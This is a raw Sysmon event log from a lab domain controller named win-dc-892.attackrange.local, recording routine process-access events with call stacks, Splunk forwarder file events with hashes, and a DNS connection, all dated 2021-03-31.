12:02:35.995{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:35.995{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:35.995{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:35.995{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x80000000000000007456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:35.995{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:35.995{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:35.995{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+18280|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:35.995{266CAFBE-64C4-6064-9B00-00000000AE01}49246164C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 354300x80000000000000007754Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.324{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61767- 23542300x80000000000000007753Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:37.459{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BEB32DE17C8122B4AEC33B2C658A7AA,SHA256=EFCBE14FE1D21310208267658C2AB13E56742FE0586AC1807E64CC12254D5E02,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007752Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:37.443{266CAFBE-647D-6064-3300-00000000AE01}25203396C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000007751Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:37.443{266CAFBE-647D-6064-3300-00000000AE01}25203396C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x80000000000000007750Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:37.428{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007749Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:37.428{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007748Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:37.428{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4
.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000007747Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:37.428{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000007755Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:38.472{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F06E8F836521C21771D545903E2241D,SHA256=3EDACF8E57EB4F40F50531F7E859B8CCCCD84D5394F0E4AEA00EC47ED0EE08E3,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000007756Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:39.484{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B057436143B7949ECE487BD60519E12,SHA256=2D0FDC49953B7E153FDA2DBD7E74746A2C4DC240C280921FFCAD1BE56B92BA09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007757Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:40.528{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=657C0E35DF19C8B8E5BEBFDA3904420E,SHA256=A71C553D481BB21D40DEC62E25622FE7EAA9E5533E9CB9740C4D02C8061B52DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007772Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.822{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-64E1-6064-B900-00000000AE01}6760C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007771Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:41.822{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64E1-6064-B900-00000000AE01}6760C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007770Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.806{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64E1-6064-B900-00000000AE01}6760C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000007769Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.806{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1200_POS4.jpgMD5=1E7D614892552BF17B2B08D30138EF64,SHA256=E37824373B3B7BA11537E7C32F933972B521C1FAF75D9A9585030F8DDDEFB304,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000007768Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.806{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-64E1-6064-B900-00000000AE01}6760C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007767Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.806{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64E1-6064-B900-00000000AE01}6760C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007766Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.806{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64E1-6064-B900-00000000AE01}6760C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000007765Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
